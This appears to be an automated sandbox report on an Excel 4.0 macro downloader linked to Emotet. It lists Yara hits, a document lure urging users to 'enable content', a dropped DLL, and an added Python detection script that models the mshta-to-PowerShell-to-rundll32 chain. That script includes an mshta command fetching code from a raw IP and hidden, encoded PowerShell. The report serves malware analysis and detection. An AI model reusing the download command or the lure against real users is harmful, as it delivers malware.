Source: Yara match File source: 0000000F.00000002.615997372.00000000001D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522595880.0000000002ED0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616558132.0000000002411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616683416.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575020499.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.616861944.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617100945.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673429165.0000000000910000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.471313951.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.524627088.00000000001B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522683360.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.577775644.00000000005F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574936921.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.522655348.0000000003171000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575098711.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.575908934.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.675391959.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.681991915.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673370884.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.617022562.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618251514.0000000000201000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.574901913.0000000000771000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.673563319.00000000023E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.677112650.00000000031D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.618216688.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\QWER.dll, type: DROPPED

System Summary

barindex
Source: DETAILS-145.xls Macro extractor: Sheet: Macro1 contains: mshta
Source: DETAILS-145.xls, type: SAMPLE Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: C:\Users\user\Desktop\DETAILS-145.xls, type: DROPPED Matched rule: Detects OLE Excel 4 Macros documents acting as downloaders Author: ditekSHen
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: DETAILS-145.xls Stream path 'Workbook' : BIFF8 workbook stream (binary; the report prints it raw). Readable fragments: the WRITEACCESS (last saved by) user name "xXx", FONT records for Calibri, Calibri Light and Arial, and built-in number-format strings such as _-* #,##0_-;\-* #,##0_-;_-* "-"_-;_-@_- and _("$"* #,##0.00_);_("$"* \(#,##0.00\);_("$"* "-"??_);_(@_); the remainder is record data with no printable content.
Source: DETAILS-145.xls.0.dr Stream path 'Workbook' : the same BIFF8 workbook stream as the submitted sample, in the copy written to the sandbox desktop; it differs only in the WRITEACCESS user name, which is "user" here.
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\QWER.dll Jump to dropped file
Source: DETAILS-145.xls Initial sample: EXEC
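The System Summary records, read together with the Sigma hits in the overview, give the whole execution chain: the Excel 4.0 macro sheet calls EXEC on mshta, mshta launches PowerShell, PowerShell writes C:\ProgramData\QWER.dll, and the Emotet Yara matches land in rundll32 processes. Below is an added example of that chain expressed as detection logic and run over constructed Sysmon-style events; it is not part of the report. The tree shape and the dropped-file path come from this page; the command lines, PIDs, Office install path and the DLL export name are assumed for the sake of the example, as are the rule thresholds (command line longer than 1000 characters, drop directory C:\ProgramData).

```python
"""Detection rules for the Excel -> mshta -> powershell -> DLL-in-ProgramData ->
rundll32 chain in this report, evaluated over constructed process/file events.
Added example; command lines, PIDs and paths marked below are assumptions."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple


@dataclass
class Event:
    kind: str                     # "process" = process creation, "file" = file creation
    image: str                    # full path of the acting process
    pid: int
    parent: Optional[str] = None  # parent image (process events)
    ppid: int = 0
    cmdline: str = ""
    target: str = ""              # path written (file events)


OFFICE = {"excel.exe", "winword.exe", "powerpnt.exe"}
SHELLS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe",
          "cscript.exe", "rundll32.exe", "regsvr32.exe"}
DROP_DIR = "c:\\programdata\\"   # directory the report shows QWER.dll written to


def base(path: Optional[str]) -> str:
    """Case-folded file name of a Windows path ('' for None)."""
    return (path or "").rsplit("\\", 1)[-1].lower()


def office_spawns_shell(e: Event) -> bool:
    return e.kind == "process" and base(e.parent) in OFFICE and base(e.image) in SHELLS


def mshta_spawns_shell(e: Event) -> bool:
    return e.kind == "process" and base(e.parent) == "mshta.exe" and base(e.image) in SHELLS


def suspicious_powershell_cmdline(e: Event) -> bool:
    """Encoded (-e/-enc), hidden window or bypass switches, or a very long command line."""
    if e.kind != "process" or base(e.image) != "powershell.exe":
        return False
    toks = e.cmdline.lower().split()
    encoded = any(t.startswith(("-", "/")) and t[1:2] == "e" for t in toks)
    return encoded or "hidden" in toks or "bypass" in toks or len(e.cmdline) > 1000


def powershell_drops_pe_in_programdata(e: Event) -> bool:
    t = e.target.lower()
    return (e.kind == "file" and base(e.image) == "powershell.exe"
            and t.startswith(DROP_DIR) and t.endswith((".dll", ".exe")))


def rundll32_loads_programdata_dll(e: Event) -> bool:
    return (e.kind == "process" and base(e.image) == "rundll32.exe"
            and DROP_DIR in e.cmdline.lower())


RULES: Dict[str, Callable[[Event], bool]] = {
    "office_product_spawning_windows_shell": office_spawns_shell,
    "mshta_spawning_windows_shell": mshta_spawns_shell,
    "suspicious_powershell_command_line": suspicious_powershell_cmdline,
    "powershell_drops_pe_file": powershell_drops_pe_in_programdata,
    "rundll32_from_programdata": rundll32_loads_programdata_dll,
}


def run_rules(events: List[Event]) -> List[Tuple[str, int]]:
    """(rule name, pid) for every event that matches a rule."""
    return [(name, e.pid) for e in events for name, rule in RULES.items() if rule(e)]


def chain_linked(events: List[Event], hits: List[Tuple[str, int]]) -> bool:
    """True when every rule fired and rundll32 descends from powershell, which descends from mshta."""
    if {n for n, _ in hits} != set(RULES):
        return False
    by_pid = {e.pid: e for e in events if e.kind == "process"}
    pids = dict(hits)

    def ancestors(pid: int) -> List[int]:
        seen: List[int] = []
        while pid in by_pid and by_pid[pid].ppid not in seen:
            pid = by_pid[pid].ppid
            seen.append(pid)
        return seen

    ps_pid = pids["mshta_spawning_windows_shell"]
    return (ps_pid in ancestors(pids["rundll32_from_programdata"])
            and pids["office_product_spawning_windows_shell"] in ancestors(ps_pid))


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
XL = "C:\\Program Files\\Microsoft Office\\Office16\\EXCEL.EXE"   # install path assumed
# Constructed events modelled on the report's process tree; command lines are assumed.
EVENTS = [
    Event("process", XL, 1, parent="C:\\Windows\\explorer.exe", cmdline="EXCEL.EXE DETAILS-145.xls"),
    Event("process", "C:\\Windows\\System32\\mshta.exe", 2, parent=XL, ppid=1,
          cmdline="mshta http://91.240.118.168/qqw/aas/se.html"),      # URL from the report
    Event("process", PS, 3, parent="C:\\Windows\\System32\\mshta.exe", ppid=2,
          cmdline="powershell -w hidden -enc " + "A" * 1200),           # payload assumed
    Event("file", PS, 3, target="C:\\ProgramData\\QWER.dll"),           # path from the report
    Event("process", "C:\\Windows\\SysWOW64\\rundll32.exe", 4, parent=PS, ppid=3,
          cmdline="rundll32.exe C:\\ProgramData\\QWER.dll,ExportName"),  # export name assumed
]

if __name__ == "__main__":
    hits = run_rules(EVENTS)
    print(hits, "linked chain:", chain_linked(EVENTS, hits))
```

Each rule on its own fires on plenty of legitimate activity (an add-in launching rundll32, an admin's long PowerShell one-liner); chain_linked is the part worth alerting on, because it requires the hits to sit on one parent chain in the order the report shows rather than anywhere on the host.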
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036007 9_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041050 9_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003130F 9_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100323E2 9_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030460 9_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041592 9_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003E59F 9_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003960C 9_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100317E2 9_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10040B0E 9_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031BB6 9_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10041C56 9_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10036CB5 9_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1001CD16 9_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10042D21 9_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10031FC2 9_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00179700 9_2_00179700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00185CF9 9_2_00185CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00185040 9_2_00185040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018109E 9_2_0018109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176083 9_2_00176083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001770ED 9_2_001770ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017911A 9_2_0017911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017F154 9_2_0017F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018A156 9_2_0018A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00189186 9_2_00189186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001841A7 9_2_001841A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017E243 9_2_0017E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018026B 9_2_0018026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018129C 9_2_0018129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017C309 9_2_0017C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018B391 9_2_0018B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018C38F 9_2_0018C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018D3C8 9_2_0018D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017B41A 9_2_0017B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018A429 9_2_0018A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018542E 9_2_0018542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0019146E 9_2_0019146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018E498 9_2_0018E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001804B8 9_2_001804B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001874DD 9_2_001874DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001904DE 9_2_001904DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001864F1 9_2_001864F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001744FA 9_2_001744FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183512 9_2_00183512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017F58F 9_2_0017F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001845CD 9_2_001845CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018561F 9_2_0018561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018363D 9_2_0018363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00178650 9_2_00178650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00193672 9_2_00193672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017472E 9_2_0017472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00182753 9_2_00182753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017777B 9_2_0017777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00172830 9_2_00172830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00181831 9_2_00181831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017B821 9_2_0017B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017C850 9_2_0017C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00186864 9_2_00186864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017E86A 9_2_0017E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00190867 9_2_00190867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001768DE 9_2_001768DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018D8D7 9_2_0018D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001788F4 9_2_001788F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017F93D 9_2_0017F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00171950 9_2_00171950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017194C 9_2_0017194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00180946 9_2_00180946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00191993 9_2_00191993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018C9A9 9_2_0018C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_001899AA 9_2_001899AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176A1F 9_2_00176A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017CA43 9_2_0017CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00179A7D 9_2_00179A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00191B54 9_2_00191B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00184B56 9_2_00184B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017BB4B 9_2_0017BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017AB66 9_2_0017AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00177B82 9_2_00177B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00187BCA 9_2_00187BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018EBFF 9_2_0018EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00182BF6 9_2_00182BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176C29 9_2_00176C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017EC9B 9_2_0017EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018CC89 9_2_0018CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018ACD3 9_2_0018ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017BD0F 9_2_0017BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00180D33 9_2_00180D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00190D5B 9_2_00190D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00183D41 9_2_00183D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00188D71 9_2_00188D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00178D95 9_2_00178D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017FD8C 9_2_0017FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018EE94 9_2_0018EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017AE9A 9_2_0017AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018BE8C 9_2_0018BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00176ED6 9_2_00176ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0018FF31 9_2_0018FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00171F9B 9_2_00171F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00173FB8 9_2_00173FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00172FA1 9_2_00172FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_0017CFCE 9_2_0017CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023BE8C 10_2_0023BE8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023EE94 10_2_0023EE94
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022EC9B 10_2_0022EC9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023E498 10_2_0023E498
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002270ED 10_2_002270ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00235CF9 10_2_00235CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002374DD 10_2_002374DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022F93D 10_2_0022F93D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229700 10_2_00229700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00233512 10_2_00233512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00241B54 10_2_00241B54
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023B391 10_2_0023B391
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228D95 10_2_00228D95
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022B821 10_2_0022B821
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023A429 10_2_0023A429
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226C29 10_2_00226C29
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023542E 10_2_0023542E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00231831 10_2_00231831
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00222830 10_2_00222830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023363D 10_2_0023363D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022B41A 10_2_0022B41A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023561F 10_2_0023561F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226A1F 10_2_00226A1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00240867 10_2_00240867
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00236864 10_2_00236864
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022E86A 10_2_0022E86A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023026B 10_2_0023026B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0024146E 10_2_0024146E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00243672 10_2_00243672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00229A7D 10_2_00229A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022CA43 10_2_0022CA43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022E243 10_2_0022E243
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00235040 10_2_00235040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022C850 10_2_0022C850
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00228650 10_2_00228650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002304B8 10_2_002304B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226083 10_2_00226083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023CC89 10_2_0023CC89
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022AE9A 10_2_0022AE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023109E 10_2_0023109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023129C 10_2_0023129C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002364F1 10_2_002364F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002288F4 10_2_002288F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002244FA 10_2_002244FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023ACD3 10_2_0023ACD3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00226ED6 10_2_00226ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023D8D7 10_2_0023D8D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002404DE 10_2_002404DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002268DE 10_2_002268DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022472E 10_2_0022472E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230D33 10_2_00230D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023FF31 10_2_0023FF31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022C309 10_2_0022C309
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022BD0F 10_2_0022BD0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022911A 10_2_0022911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022AB66 10_2_0022AB66
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00238D71 10_2_00238D71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022777B 10_2_0022777B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00233D41 10_2_00233D41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00230946 10_2_00230946
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022BB4B 10_2_0022BB4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022194C 10_2_0022194C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00232753 10_2_00232753
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00221950 10_2_00221950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023A156 10_2_0023A156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00234B56 10_2_00234B56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022F154 10_2_0022F154
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00240D5B 10_2_00240D5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00222FA1 10_2_00222FA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002341A7 10_2_002341A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002399AA 10_2_002399AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023C9A9 10_2_0023C9A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00223FB8 10_2_00223FB8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00227B82 10_2_00227B82
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00239186 10_2_00239186
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023C38F 10_2_0023C38F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022F58F 10_2_0022F58F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022FD8C 10_2_0022FD8C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00241993 10_2_00241993
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00221F9B 10_2_00221F9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00232BF6 10_2_00232BF6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023EBFF 10_2_0023EBFF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00237BCA 10_2_00237BCA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0023D3C8 10_2_0023D3C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022CFCE 10_2_0022CFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002345CD 10_2_002345CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036007 11_2_10036007
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041050 11_2_10041050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003130F 11_2_1003130F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100323E2 11_2_100323E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030460 11_2_10030460
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041592 11_2_10041592
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003E59F 11_2_1003E59F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003960C 11_2_1003960C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100317E2 11_2_100317E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10040B0E 11_2_10040B0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031BB6 11_2_10031BB6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10041C56 11_2_10041C56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10036CB5 11_2_10036CB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1001CD16 11_2_1001CD16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10042D21 11_2_10042D21
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10031FC2 11_2_10031FC2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B9700 11_2_001B9700
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C5CF9 11_2_001C5CF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C5040 11_2_001C5040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C109E 11_2_001C109E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B6083 11_2_001B6083
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B70ED 11_2_001B70ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001B911A 11_2_001B911A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001CA156 11_2_001CA156
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001BF154 11_2_001BF154
